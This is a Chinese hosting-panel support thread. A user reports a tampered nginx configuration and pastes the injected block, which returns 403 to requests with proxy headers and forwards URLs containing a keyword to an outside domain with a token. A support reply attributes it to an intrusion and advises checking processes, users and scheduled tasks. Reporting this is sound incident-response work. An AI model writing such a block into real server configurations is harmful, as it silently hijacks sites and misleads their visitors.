【已解答】nginx配置文件被篡改

为了能快速了解并处理您的问题，请提供以下基础信息：

面板、插件版本：9.6.0

系统版本：Alibaba Cloud Linux 3.2104 LTS 64位

问题描述：

nginx配置文件被篡改，篡改内容：

if ($http_x_real_ip) {

            return 403;

        }

        if ($http_x_forwarded_for) {

            return 403;

        }

location ~* /.*unrhhto.* {

    proxy_set_header X-Static-Token "mz6dsMIfNyNVl5cA";

    proxy_pass http://0523.xinchunkuaile.top;

    proxy_set_header Host 0523.xinchunkuaile.top;

    proxy_set_header X-Real-IP $remote_addr;

    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

    proxy_set_header REMOTE-HOST $host;

    proxy_http_version 1.1;

    add_header X-Cache $upstream_cache_status;

    set $static_fileMJrCAYTq 0;

    if ($uri ~* "\.(gif|png|jpg|css|js|woff|woff2)$") {

        set $static_fileMJrCAYTq 1;

        expires 1m;

    }

    if ($static_fileMJrCAYTq = 0) {

        add_header Cache-Control no-cache;

    }

}

查看面板的操作日志并未发现异常，配置文件的权限是444

相关截图（日志、错误）：

可能是被入侵了，可以检查一下是否有异常进程，用户、定时任务等等
如需安全运维服务，可联系我司安全运维客户经理